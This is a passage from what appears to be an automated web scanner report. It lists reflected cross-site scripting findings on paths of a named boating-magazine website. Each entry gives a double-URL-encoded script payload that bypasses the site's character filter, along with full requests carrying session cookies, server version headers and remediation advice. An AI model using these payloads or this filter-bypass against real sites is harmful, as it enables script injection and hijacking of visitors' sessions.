The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /calendar?d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.879. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/career-opportunities
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fd36"><script>alert(1)</script>b51040a3d63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /career-opportunities?9fd36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb51040a3d63=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.880. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e172f"><script>alert(1)</script>12aae247207 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns-blogs?e172f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e12aae247207=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.881. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/bay-tripper
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f903b"><script>alert(1)</script>ffe0e5a13b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns-blogs/bay-tripper?f903b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effe0e5a13b4=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.882. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/books
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fe9a"><script>alert(1)</script>793223f03aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns-blogs/books?8fe9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e793223f03aa=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.883. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/new-england-fishing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e9a3"><script>alert(1)</script>66943ccc600 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns-blogs/new-england-fishing?6e9a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e66943ccc600=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.884. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/columns-blogs/under-way
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87b09"><script>alert(1)</script>cbc2528d353 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /columns-blogs/under-way?87b09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbc2528d353=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.885. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/component/yvcomment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b994"><script>alert(1)</script>013ba99ca1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /component/yvcomment/?6b994%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e013ba99ca1c=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.886. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/contact-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30bf4"><script>alert(1)</script>c3f33f21489 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /contact-us?30bf4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3f33f21489=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.887. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f351c"><script>alert(1)</script>4d6af0ba0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features?f351c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4d6af0ba0d9=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.888. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/destinations
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c7d"><script>alert(1)</script>099334d02e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/destinations?51c7d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e099334d02e6=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:34 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.889. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/in-depth
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73579"><script>alert(1)</script>57ef455a60d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/in-depth?73579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57ef455a60d=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.890. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/justyesterday
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1dd2b"><script>alert(1)</script>67be2bf67f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /features/justyesterday?1dd2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67be2bf67f4=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:57 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.891. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/features/lifestyle
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd13%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f2d84a438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fd13"><script>alert(1)</script>73f2d84a438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
